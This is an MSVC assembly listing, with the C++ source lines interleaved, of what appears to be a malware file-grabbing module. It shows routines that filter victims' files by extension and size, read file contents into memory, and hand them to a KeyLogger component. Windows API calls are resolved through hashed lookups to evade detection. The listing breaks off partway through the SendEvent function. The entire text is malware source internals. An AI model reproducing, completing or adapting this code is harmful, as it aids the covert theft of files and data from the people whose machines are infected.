;	COMDAT ?AddIgnoreBeg@FileGrabber@@YA_NPAUReceiver@1@PBD@Z
_TEXT	SEGMENT
_rv$ = 8						; size = 4
_beg$ = 12						; size = 4
?AddIgnoreBeg@FileGrabber@@YA_NPAUReceiver@1@PBD@Z PROC	; FileGrabber::AddIgnoreBeg, COMDAT
; 431  : 	for( int i = 0; i < MaxIgnoreBeg; i++ )
  00000	8b 54 24 04	 mov	 edx, DWORD PTR _rv$[esp-4]
  00004	56		 push	 esi
  00005	6a 04		 push	 4
  00007	33 f6		 xor	 esi, esi
  00009	8d 42 1c	 lea	 eax, DWORD PTR [edx+28]
  0000c	59		 pop	 ecx
$LL10@AddIgnoreB:
; 432  : 		if( rv->ignoreBeg[i][0] == 0 )
  0000d	80 38 00	 cmp	 BYTE PTR [eax], 0
  00010	74 0b		 je	 SHORT $LN16@AddIgnoreB
  00012	46		 inc	 esi
  00013	03 c1		 add	 eax, ecx
  00015	3b f1		 cmp	 esi, ecx
  00017	7c f4		 jl	 SHORT $LL10@AddIgnoreB
; 442  : 		}
; 443  : 	return false;
  00019	32 c0		 xor	 al, al
  0001b	5e		 pop	 esi
; 444  : }
  0001c	c3		 ret	 0
$LN16@AddIgnoreB:
  0001d	53		 push	 ebx
; 433  : 		{
; 434  : 			int j;
; 435  : 			for( j = 0; j < MaxLenIgnoreBeg && beg[j]; j++ )
  0001e	33 c0		 xor	 eax, eax
  00020	57		 push	 edi
$LL6@AddIgnoreB:
  00021	8b 7c 24 14	 mov	 edi, DWORD PTR _beg$[esp+8]
  00025	8a 1c 38	 mov	 bl, BYTE PTR [eax+edi]
  00028	84 db		 test	 bl, bl
  0002a	74 0c		 je	 SHORT $LN4@AddIgnoreB
; 436  : 				rv->ignoreBeg[i][j] = beg[j];
  0002c	8d 7c b0 1c	 lea	 edi, DWORD PTR [eax+esi*4+28]
  00030	40		 inc	 eax
  00031	3b c1		 cmp	 eax, ecx
  00033	88 1c 17	 mov	 BYTE PTR [edi+edx], bl
  00036	7c e9		 jl	 SHORT $LL6@AddIgnoreB
$LN4@AddIgnoreB:
; 437  : 			//
; 438  : 			rv->ignoreBeg[i][j++] = 0; //
 _memset, 
  00038	8d 7c b0 1c	 lea	 edi, DWORD PTR [eax+esi*4+28]
  0003c	40		 inc	 eax
; 439  : 			for( ; j < MaxLenIgnoreBeg; j++ )
  0003d	3b c1		 cmp	 eax, ecx
  0003f	c6 04 17 00	 mov	 BYTE PTR [edi+edx], 0
  00043	7d 11		 jge	 SHORT $LN3@AddIgnoreB
  00045	8d 7c b0 1c	 lea	 edi, DWORD PTR [eax+esi*4+28]
  00049	8d 34 b0	 lea	 esi, DWORD PTR [eax+esi*4]
  0004c	03 fa		 add	 edi, edx
  0004e	8d 74 16 1b	 lea	 esi, DWORD PTR [esi+edx+27]
  00052	2b c8		 sub	 ecx, eax
  00054	f3 a4		 rep movsb
$LN3@AddIgnoreB:
  00056	5f		 pop	 edi
  00057	5b		 pop	 ebx
; 440  : 				rv->ignoreBeg[i][j] = rv->ignoreBeg[i][j - 1];
; 441  : 			return true;
  00058	b0 01		 mov	 al, 1
  0005a	5e		 pop	 esi
; 444  : }
  0005b	c3		 ret	 0
?AddIgnoreBeg@FileGrabber@@YA_NPAUReceiver@1@PBD@Z ENDP	; FileGrabber::AddIgnoreBeg
_TEXT	ENDS
EXTRN	?m_memcpy@@YAPAXPAXPBXH@Z:PROC			; m_memcpy
; Function compile flags: /Ogspy
;	COMDAT ?CopyArrayExt@FileGrabber@@YAPAKPBK@Z
_TEXT	SEGMENT
?CopyArrayExt@FileGrabber@@YAPAKPBK@Z PROC		; FileGrabber::CopyArrayExt, COMDAT
; _m$ = ebx
; 448  : 	//
; 449  : 	const DWORD* pm = m;
  00000	8b c3		 mov	 eax, ebx
$LL3@CopyArrayE:
; 450  : 	while( *pm++ );
  00002	8b 08		 mov	 ecx, DWORD PTR [eax]
  00004	83 c0 04	 add	 eax, 4
  00007	85 c9		 test	 ecx, ecx
  00009	75 f7		 jne	 SHORT $LL3@CopyArrayE
; 451  : 	int sz = (pm - m) * sizeof(DWORD);
  0000b	2b c3		 sub	 eax, ebx
  0000d	c1 f8 02	 sar	 eax, 2
  00010	56		 push	 esi
  00011	c1 e0 02	 shl	 eax, 2
  00014	57		 push	 edi
  00015	8b f8		 mov	 edi, eax
; 452  : 	DWORD* ret = (DWORD*)MemAlloc(sz);
  00017	57		 push	 edi
  00018	e8 00 00 00 00	 call	 ?MemAlloc@@YAPAXK@Z	; MemAlloc
  0001d	8b f0		 mov	 esi, eax
  0001f	59		 pop	 ecx
; 453  : 	if( ret )
  00020	85 f6		 test	 esi, esi
  00022	74 0b		 je	 SHORT $LN1@CopyArrayE
; 454  : 		m_memcpy( ret, m, sz );
  00024	57		 push	 edi
  00025	53		 push	 ebx
  00026	56		 push	 esi
  00027	e8 00 00 00 00	 call	 ?m_memcpy@@YAPAXPAXPBXH@Z ; m_memcpy
  0002c	83 c4 0c	 add	 esp, 12			; 0000000cH
$LN1@CopyArrayE:
  0002f	5f		 pop	 edi
; 455  : 	return ret;
  00030	8b c6		 mov	 eax, esi
  00032	5e		 pop	 esi
; 456  : }
  00033	c3		 ret	 0
?CopyArrayExt@FileGrabber@@YAPAKPBK@Z ENDP		; FileGrabber::CopyArrayExt
_TEXT	ENDS
PUBLIC	?AddIgnoreExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z ; FileGrabber::AddIgnoreExt
; Function compile flags: /Ogspy
;	COMDAT ?AddIgnoreExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z
_TEXT	SEGMENT
_rv$ = 8						; size = 4
_m$ = 12						; size = 4
?AddIgnoreExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z PROC	; FileGrabber::AddIgnoreExt, COMDAT
; 460  : {
  00000	53		 push	 ebx
; 461  : 	rv->ignoreExt = CopyArrayExt(m);
  00001	8b 5c 24 0c	 mov	 ebx, DWORD PTR _m$[esp]
  00005	e8 00 00 00 00	 call	 ?CopyArrayExt@FileGrabber@@YAPAKPBK@Z ; FileGrabber::CopyArrayExt
  0000a	8b 4c 24 08	 mov	 ecx, DWORD PTR _rv$[esp]
; 462  : 	if( rv->ignoreExt )
  0000e	85 c0		 test	 eax, eax
  00010	89 41 2c	 mov	 DWORD PTR [ecx+44], eax
  00013	0f 95 c0	 setne	 al
  00016	5b		 pop	 ebx
; 463  : 		return true;
; 464  : 	return false;
; 465  : }
  00017	c3		 ret	 0
?AddIgnoreExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z ENDP	; FileGrabber::AddIgnoreExt
_TEXT	ENDS
PUBLIC	?AddNeededExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z ; FileGrabber::AddNeededExt
; Function compile flags: /Ogspy
;	COMDAT ?AddNeededExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z
_TEXT	SEGMENT
_rv$ = 8						; size = 4
_m$ = 12						; size = 4
?AddNeededExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z PROC	; FileGrabber::AddNeededExt, COMDAT
; 469  : {
  00000	53		 push	 ebx
; 470  : 	rv->neededExt = CopyArrayExt(m);
  00001	8b 5c 24 0c	 mov	 ebx, DWORD PTR _m$[esp]
  00005	e8 00 00 00 00	 call	 ?CopyArrayExt@FileGrabber@@YAPAKPBK@Z ; FileGrabber::CopyArrayExt
  0000a	8b 4c 24 08	 mov	 ecx, DWORD PTR _rv$[esp]
; 471  : 	if( rv->neededExt )
  0000e	85 c0		 test	 eax, eax
  00010	89 41 30	 mov	 DWORD PTR [ecx+48], eax
  00013	0f 95 c0	 setne	 al
  00016	5b		 pop	 ebx
; 472  : 		return true;
; 473  : 	return false;
; 474  : }
  00017	c3		 ret	 0
?AddNeededExt@FileGrabber@@YA_NPAUReceiver@1@PBK@Z ENDP	; FileGrabber::AddNeededExt
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0EIHPOBGL@$0BK@PAXPAEHPAKH@@YAPAXPAXPAEHPAKH@Z ; pushargEx<1,1216340331,26,void *,unsigned char *,int,unsigned long *,int>
EXTRN	?GetProcAddressEx2@@YAPAXPADKKH@Z:PROC		; GetProcAddressEx2
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
;	COMDAT ??$pushargEx@$00$0EIHPOBGL@$0BK@PAXPAEHPAKH@@YAPAXPAXPAEHPAKH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
_a5$ = 24						; size = 4
??$pushargEx@$00$0EIHPOBGL@$0BK@PAXPAEHPAKH@@YAPAXPAXPAEHPAKH@Z PROC ; pushargEx<1,1216340331,26,void *,unsigned char *,int,unsigned long *,int>, COMDAT
; 131  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 132  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D, E);
; 133  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00003	6a 1a		 push	 26			; 0000001aH
  00005	68 6b e1 7f 48	 push	 1216340331		; 487fe16bH
  0000a	6a 01		 push	 1
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 134  : 	return func(a1, a2, a3, a4, a5);
  00016	ff 75 18	 push	 DWORD PTR _a5$[ebp]
  00019	ff 75 14	 push	 DWORD PTR _a4$[ebp]
  0001c	ff 75 10	 push	 DWORD PTR _a3$[ebp]
  0001f	ff 75 0c	 push	 DWORD PTR _a2$[ebp]
  00022	ff 75 08	 push	 DWORD PTR _a1$[ebp]
  00025	ff d0		 call	 eax
; 135  : }
  00027	5d		 pop	 ebp
  00028	c3		 ret	 0
??$pushargEx@$00$0EIHPOBGL@$0BK@PAXPAEHPAKH@@YAPAXPAXPAEHPAKH@Z ENDP ; pushargEx<1,1216340331,26,void *,unsigned char *,int,unsigned long *,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0OPEIOADK@$0BL@PAXHHH@@YAPAXPAXHHH@Z ; pushargEx<1,4014530618,27,void *,int,int,int>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0OPEIOADK@$0BL@PAXHHH@@YAPAXPAXHHH@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
_a3$ = 16						; size = 4
_a4$ = 20						; size = 4
??$pushargEx@$00$0OPEIOADK@$0BL@PAXHHH@@YAPAXPAXHHH@Z PROC ; pushargEx<1,4014530618,27,void *,int,int,int>, COMDAT
; 124  : 	typedef LPVOID (WINAPI *newfunc)(A, B, C, D);
; 125  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 1b		 push	 27			; 0000001bH
  00002	68 3a e0 48 ef	 push	 -280436678		; ef48e03aH
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 126  : 	return func(a1,a2,a3,a4);
  00013	ff 74 24 10	 push	 DWORD PTR _a4$[esp-4]
  00017	ff 74 24 10	 push	 DWORD PTR _a3$[esp]
  0001b	ff 74 24 10	 push	 DWORD PTR _a2$[esp+4]
  0001f	ff 74 24 10	 push	 DWORD PTR _a1$[esp+8]
  00023	ff d0		 call	 eax
; 127  : }
  00025	c3		 ret	 0
??$pushargEx@$00$0OPEIOADK@$0BL@PAXHHH@@YAPAXPAXHHH@Z ENDP ; pushargEx<1,4014530618,27,void *,int,int,int>
_TEXT	ENDS
PUBLIC	??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ; pushargEx<1,2935475185,37,void *,unsigned long *>
; Function compile flags: /Ogspy
;	COMDAT ??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
_a2$ = 12						; size = 4
??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z PROC ; pushargEx<1,2935475185,37,void *,unsigned long *>, COMDAT
; 108  : 	typedef LPVOID (WINAPI *newfunc)(A, B);
; 109  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	6a 25		 push	 37			; 00000025H
  00002	68 f1 cb f7 ae	 push	 -1359492111		; aef7cbf1H
  00007	6a 01		 push	 1
  00009	6a 00		 push	 0
  0000b	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00010	83 c4 10	 add	 esp, 16			; 00000010H
; 110  : 	return func(a1,a2);
  00013	ff 74 24 08	 push	 DWORD PTR _a2$[esp-4]
  00017	ff 74 24 08	 push	 DWORD PTR _a1$[esp]
  0001b	ff d0		 call	 eax
; 111  : }
  0001d	c3		 ret	 0
??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ENDP ; pushargEx<1,2935475185,37,void *,unsigned long *>
_TEXT	ENDS
PUBLIC	??$DBGOutMessage@PBDPBDPA_WHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PA_WHH@Z ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,wchar_t *,int,int>
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\dbgtemplates.h
;	COMDAT ??$DBGOutMessage@PBDPBDPA_WHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PA_WHH@Z
_TEXT	SEGMENT
_Module$ = 8						; size = 4
_Str$ = 12						; size = 4
_Arg1$ = 16						; size = 4
_Arg2$ = 20						; size = 4
_Arg3$ = 24						; size = 4
??$DBGOutMessage@PBDPBDPA_WHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PA_WHH@Z PROC ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,wchar_t *,int,int>, COMDAT
; 90   : 	#ifdef DebugUtils
; 91   : 		Debug::MessageEx((PCHAR)Module, 0, NULL, NULL, (PCHAR)Str, Arg1, Arg2, Arg3);
; 92   : 	#endif
; 93   : }
  00000	c3		 ret	 0
??$DBGOutMessage@PBDPBDPA_WHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PA_WHH@Z ENDP ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,wchar_t *,int,int>
_TEXT	ENDS
PUBLIC	??$DBGOutMessage@PBDPBDPADHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PADHH@Z ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,int,int>
; Function compile flags: /Ogspy
;	COMDAT ??$DBGOutMessage@PBDPBDPADHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PADHH@Z
_TEXT	SEGMENT
_Module$ = 8						; size = 4
_Str$ = 12						; size = 4
_Arg1$ = 16						; size = 4
_Arg2$ = 20						; size = 4
_Arg3$ = 24						; size = 4
??$DBGOutMessage@PBDPBDPADHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PADHH@Z PROC ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,int,int>, COMDAT
; 90   : 	#ifdef DebugUtils
; 91   : 		Debug::MessageEx((PCHAR)Module, 0, NULL, NULL, (PCHAR)Str, Arg1, Arg2, Arg3);
; 92   : 	#endif
; 93   : }
  00000	c3		 ret	 0
??$DBGOutMessage@PBDPBDPADHH@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PADHH@Z ENDP ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,int,int>
_TEXT	ENDS
PUBLIC	??$DBGOutMessage@PBDPBDPADPBD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD0@Z ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,char const *>
; Function compile flags: /Ogspy
;	COMDAT ??$DBGOutMessage@PBDPBDPADPBD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD0@Z
_TEXT	SEGMENT
_Module$ = 8						; size = 4
_Str$ = 12						; size = 4
_Arg1$ = 16						; size = 4
_Arg2$ = 20						; size = 4
??$DBGOutMessage@PBDPBDPADPBD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD0@Z PROC ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,char const *>, COMDAT
; 82   : 	#ifdef DebugUtils
; 83   : 		Debug::MessageEx((PCHAR)Module, 0, NULL, NULL, (PCHAR)Str, Arg1, Arg2);
; 84   : 	#endif
; 85   : }
  00000	c3		 ret	 0
??$DBGOutMessage@PBDPBDPADPBD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD0@Z ENDP ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,char const *>
_TEXT	ENDS
PUBLIC	??$pushargEx@$0BD@$0OGODOOAB@$0CBF@PAD@@YAPAXPAD@Z ; pushargEx<19,3873697281,533,char *>
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\getapi.h
;	COMDAT ??$pushargEx@$0BD@$0OGODOOAB@$0CBF@PAD@@YAPAXPAD@Z
_TEXT	SEGMENT
_a1$ = 8						; size = 4
??$pushargEx@$0BD@$0OGODOOAB@$0CBF@PAD@@YAPAXPAD@Z PROC	; pushargEx<19,3873697281,533,char *>, COMDAT
; 100  : 	typedef LPVOID (WINAPI *newfunc)(A);
; 101  : 	newfunc func = (newfunc)GetProcAddressEx2( NULL, h, hash, CacheIndex );
  00000	68 15 02 00 00	 push	 533			; 00000215H
  00005	68 01 ee e3 e6	 push	 -421270015		; e6e3ee01H
  0000a	6a 13		 push	 19			; 00000013H
  0000c	6a 00		 push	 0
  0000e	e8 00 00 00 00	 call	 ?GetProcAddressEx2@@YAPAXPADKKH@Z ; GetProcAddressEx2
  00013	83 c4 10	 add	 esp, 16			; 00000010H
; 102  : 	return func(a1);
  00016	ff 74 24 04	 push	 DWORD PTR _a1$[esp-4]
  0001a	ff d0		 call	 eax
; 103  : }
  0001c	c3		 ret	 0
??$pushargEx@$0BD@$0OGODOOAB@$0CBF@PAD@@YAPAXPAD@Z ENDP	; pushargEx<19,3873697281,533,char *>
_TEXT	ENDS
PUBLIC	??$DBGOutMessage@PBDPBDPADPAD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD1@Z ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,char *>
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\core\dbgtemplates.h
;	COMDAT ??$DBGOutMessage@PBDPBDPADPAD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD1@Z
_TEXT	SEGMENT
_Module$ = 8						; size = 4
_Str$ = 12						; size = 4
_Arg1$ = 16						; size = 4
_Arg2$ = 20						; size = 4
??$DBGOutMessage@PBDPBDPADPAD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD1@Z PROC ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,char *>, COMDAT
; 82   : 	#ifdef DebugUtils
; 83   : 		Debug::MessageEx((PCHAR)Module, 0, NULL, NULL, (PCHAR)Str, Arg1, Arg2);
; 84   : 	#endif
; 85   : }
  00000	c3		 ret	 0
??$DBGOutMessage@PBDPBDPADPAD@FILEGRABBERDEBUGSTRINGS@@YAXPBD0PAD1@Z ENDP ; FILEGRABBERDEBUGSTRINGS::DBGOutMessage<char const *,char const *,char *,char *>
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\common\filegrabber.cpp
_TEXT	ENDS
;	COMDAT ?LoadFile@FileGrabber@@YA_NAAUParamEvent@1@@Z
_TEXT	SEGMENT
_size$66488 = -4					; size = 4
?LoadFile@FileGrabber@@YA_NAAUParamEvent@1@@Z PROC	; FileGrabber::LoadFile, COMDAT
; _e$ = esi
; 158  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
  00003	51		 push	 ecx
  00004	53		 push	 ebx
; 159  : 	if( e.data ) return true; //
  00005	33 db		 xor	 ebx, ebx
  00007	39 9e 18 02 00
	00		 cmp	 DWORD PTR [esi+536], ebx
  0000d	74 04		 je	 SHORT $LN4@LoadFile
$LN7@LoadFile:
  0000f	b0 01		 mov	 al, 1
  00011	eb 6d		 jmp	 SHORT $LN5@LoadFile
$LN4@LoadFile:
; 160  : 	e.data = (BYTE*)MemAlloc(e.szData + 1); //
  00013	8b 86 1c 02 00
	00		 mov	 eax, DWORD PTR [esi+540]
  00019	40		 inc	 eax
  0001a	50		 push	 eax
  0001b	e8 00 00 00 00	 call	 ?MemAlloc@@YAPAXK@Z	; MemAlloc
  00020	59		 pop	 ecx
  00021	89 86 18 02 00
	00		 mov	 DWORD PTR [esi+536], eax
; 161  : 	if( e.data ) 
  00027	3b c3		 cmp	 eax, ebx
  00029	74 53		 je	 SHORT $LN1@LoadFile
; 162  : 	{
; 163  : 		DWORD size = 0;
; 164  : 		pReadFile( e.file, e.data, e.szData, &size, NULL ); //
  0002b	53		 push	 ebx
  0002c	8d 4d fc	 lea	 ecx, DWORD PTR _size$66488[ebp]
  0002f	51		 push	 ecx
  00030	ff b6 1c 02 00
	00		 push	 DWORD PTR [esi+540]
  00036	89 5d fc	 mov	 DWORD PTR _size$66488[ebp], ebx
  00039	50		 push	 eax
  0003a	ff b6 24 02 00
	00		 push	 DWORD PTR [esi+548]
  00040	e8 00 00 00 00	 call	 ??$pushargEx@$00$0EIHPOBGL@$0BK@PAXPAEHPAKH@@YAPAXPAXPAEHPAKH@Z ; pushargEx<1,1216340331,26,void *,unsigned char *,int,unsigned long *,int>
; 165  : 		pSetFilePointer( e.file, 0, 0, FILE_BEGIN );
  00045	53		 push	 ebx
  00046	53		 push	 ebx
  00047	53		 push	 ebx
  00048	ff b6 24 02 00
	00		 push	 DWORD PTR [esi+548]
  0004e	e8 00 00 00 00	 call	 ??$pushargEx@$00$0OPEIOADK@$0BL@PAXHHH@@YAPAXPAXHHH@Z ; pushargEx<1,4014530618,27,void *,int,int,int>
; 166  : 		if( size == e.szData ) //
  00053	8b 86 1c 02 00
	00		 mov	 eax, DWORD PTR [esi+540]
  00059	83 c4 24	 add	 esp, 36			; 00000024H
  0005c	39 45 fc	 cmp	 DWORD PTR _size$66488[ebp], eax
  0005f	75 0b		 jne	 SHORT $LN2@LoadFile
; 167  : 		{
; 168  : 			((char*)e.data)[e.szData] = 0; //
  00061	8b 8e 18 02 00
	00		 mov	 ecx, DWORD PTR [esi+536]
  00067	88 1c 08	 mov	 BYTE PTR [eax+ecx], bl
; 169  : 			return true;
  0006a	eb a3		 jmp	 SHORT $LN7@LoadFile
$LN2@LoadFile:
; 170  : 		}
; 171  : 		else
; 172  : 		{
; 173  : 			MemFree(e.data);
  0006c	ff b6 18 02 00
	00		 push	 DWORD PTR [esi+536]
  00072	e8 00 00 00 00	 call	 ?MemFree@@YAXPAX@Z	; MemFree
  00077	59		 pop	 ecx
; 174  : 			e.data = 0;
  00078	89 9e 18 02 00
	00		 mov	 DWORD PTR [esi+536], ebx
$LN1@LoadFile:
; 175  : 		}
; 176  : 	}
; 177  : 	return false;
  0007e	32 c0		 xor	 al, al
$LN5@LoadFile:
  00080	5b		 pop	 ebx
; 178  : }
  00081	c9		 leave
  00082	c3		 ret	 0
?LoadFile@FileGrabber@@YA_NAAUParamEvent@1@@Z ENDP	; FileGrabber::LoadFile
_TEXT	ENDS
PUBLIC	??_C@_0M@BHANHMDL@FileGrabber?$AA@		; `string'
PUBLIC	?SendEvent@FileGrabber@@YAXAAUParamEvent@1@@Z	; FileGrabber::SendEvent
EXTRN	?Free@STR@@YAXPAD@Z:PROC			; STR::Free
EXTRN	?AddDirectory@KeyLogger@@YAXPAD0@Z:PROC		; KeyLogger::AddDirectory
EXTRN	?m_lstrlen@@YGKPBD@Z:PROC			; m_lstrlen
EXTRN	?AddFile@KeyLogger@@YAXPAD0PAXK@Z:PROC		; KeyLogger::AddFile
EXTRN	?ExtractFileNameA@File@@YAPADPAD_N@Z:PROC	; File::ExtractFileNameA
EXTRN	?ToAnsi@WSTR@@YAPADPB_WK@Z:PROC			; WSTR::ToAnsi
EXTRN	?WildCmp@@YA_NPBD0@Z:PROC			; WildCmp
EXTRN	?GetItem@List@@YAPAXPAXK@Z:PROC			; List::GetItem
EXTRN	?Count@List@@YAKPAX@Z:PROC			; List::Count
;	COMDAT ??_C@_0M@BHANHMDL@FileGrabber?$AA@
; File e:\projects\progs\petrosjan\bjwj\source\core\dbgtemplates.h
CONST	SEGMENT
??_C@_0M@BHANHMDL@FileGrabber?$AA@ DB 'FileGrabber', 00H ; `string'
; Function compile flags: /Ogspy
; File e:\projects\progs\petrosjan\bjwj\source\common\filegrabber.cpp
CONST	ENDS
;	COMDAT ?SendEvent@FileGrabber@@YAXAAUParamEvent@1@@Z
_TEXT	SEGMENT
_h$66538 = -20						; size = 4
_count$ = -16						; size = 4
_i$66525 = -12						; size = 4
_res$66606 = -8						; size = 4
_send$66532 = -8					; size = 4
_filters$66555 = -1					; size = 1
_e$ = 8							; size = 4
?SendEvent@FileGrabber@@YAXAAUParamEvent@1@@Z PROC	; FileGrabber::SendEvent, COMDAT
; 182  : {
  00000	55		 push	 ebp
  00001	8b ec		 mov	 ebp, esp
; 183  : 	if( !receivers )
  00003	a1 00 00 00 00	 mov	 eax, DWORD PTR ?receivers@FileGrabber@@3PAXA ; FileGrabber::receivers
  00008	83 ec 14	 sub	 esp, 20			; 00000014H
  0000b	85 c0		 test	 eax, eax
  0000d	0f 84 e2 02 00
	00		 je	 $LN43@SendEvent
  00013	57		 push	 edi
; 184  : 		return;
; 185  : 	int count = List::Count(receivers);
  00014	50		 push	 eax
  00015	e8 00 00 00 00	 call	 ?Count@List@@YAKPAX@Z	; List::Count
; 186  : 	for( int i = 0; i < count; i++ )
  0001a	83 65 f4 00	 and	 DWORD PTR _i$66525[ebp], 0
  0001e	8b 7d 08	 mov	 edi, DWORD PTR _e$[ebp]
  00021	59		 pop	 ecx
  00022	89 45 f0	 mov	 DWORD PTR _count$[ebp], eax
  00025	85 c0		 test	 eax, eax
  00027	0f 8e b6 02 00
	00		 jle	 $LN39@SendEvent
  0002d	53		 push	 ebx
  0002e	56		 push	 esi
$LL61@SendEvent:
; 187  : 	{
; 188  : 		Receiver* rv = (Receiver*)List::GetItem( receivers, i );
  0002f	ff 75 f4	 push	 DWORD PTR _i$66525[ebp]
  00032	ff 35 00 00 00
	00		 push	 DWORD PTR ?receivers@FileGrabber@@3PAXA ; FileGrabber::receivers
  00038	e8 00 00 00 00	 call	 ?GetItem@List@@YAPAXPAXK@Z ; List::GetItem
  0003d	8b d8		 mov	 ebx, eax
; 189  : 		if( !rv->ignore && e.access & rv->access ) //
  0003f	80 7b 34 00	 cmp	 BYTE PTR [ebx+52], 0
  00043	59		 pop	 ecx
  00044	59		 pop	 ecx
  00045	0f 85 87 02 00
	00		 jne	 $LN40@SendEvent
  0004b	8b 87 20 02 00
	00		 mov	 eax, DWORD PTR [edi+544]
  00051	85 43 10	 test	 eax, DWORD PTR [ebx+16]
  00054	0f 84 78 02 00
	00		 je	 $LN40@SendEvent
; 190  : 		{
; 191  : 			int send = 0; //
 (>0) 
  0005a	83 65 f8 00	 and	 DWORD PTR _send$66532[ebp], 0
; 192  : 			int extFilter = FilterExt( e, rv );
  0005e	8b f3		 mov	 esi, ebx
  00060	8b c7		 mov	 eax, edi
  00062	e8 00 00 00 00	 call	 ?FilterExt@FileGrabber@@YAHABUParamEvent@1@PAUReceiver@1@@Z ; FileGrabber::FilterExt
; 193  : 			if( extFilter > 0 ) //
  00067	85 c0		 test	 eax, eax
  00069	7e 22		 jle	 SHORT $LN37@SendEvent
; 194  : 			{
; 195  : 				if( extFilter == 2 ) //
  0006b	83 f8 02	 cmp	 eax, 2
  0006e	0f 85 15 01 00
	00		 jne	 $LN58@SendEvent
; 196  : 				{
; 197  : 					if( rv->aw & LOADFILE ) //
  00074	f6 43 14 04	 test	 BYTE PTR [ebx+20], 4
  00078	74 07		 je	 SHORT $LN35@SendEvent
; 198  : 						LoadFile(e);
  0007a	8b f7		 mov	 esi, edi
  0007c	e8 00 00 00 00	 call	 ?LoadFile@FileGrabber@@YA_NAAUParamEvent@1@@Z ; FileGrabber::LoadFile
$LN35@SendEvent:
; 199  : 					send = 1;
  00081	c7 45 f8 01 00
	00 00		 mov	 DWORD PTR _send$66532[ebp], 1
; 200  : 				}
; 201  : 			}
; 202  : 			else
  00088	e9 fc 00 00 00	 jmp	 $LN58@SendEvent
$LN37@SendEvent:
; 203  : 			{
; 204  : 				DWORD h;
; 205  :  				e.szData = (DWORD)pGetFileSize( e.file, &h );
  0008d	8d 45 ec	 lea	 eax, DWORD PTR _h$66538[ebp]
  00090	50		 push	 eax
  00091	ff b7 24 02 00
	00		 push	 DWORD PTR [edi+548]
  00097	e8 00 00 00 00	 call	 ??$pushargEx@$00$0KOPHMLPB@$0CF@PAXPAK@@YAPAXPAXPAK@Z ; pushargEx<1,2935475185,37,void *,unsigned long *>
  0009c	59		 pop	 ecx
  0009d	89 87 1c 02 00
	00		 mov	 DWORD PTR [edi+540], eax
; 206  : 				//
; 207  : 				if( e.szData >= rv->minSize && (e.szData <= rv->maxSize || rv->maxSize < 0))
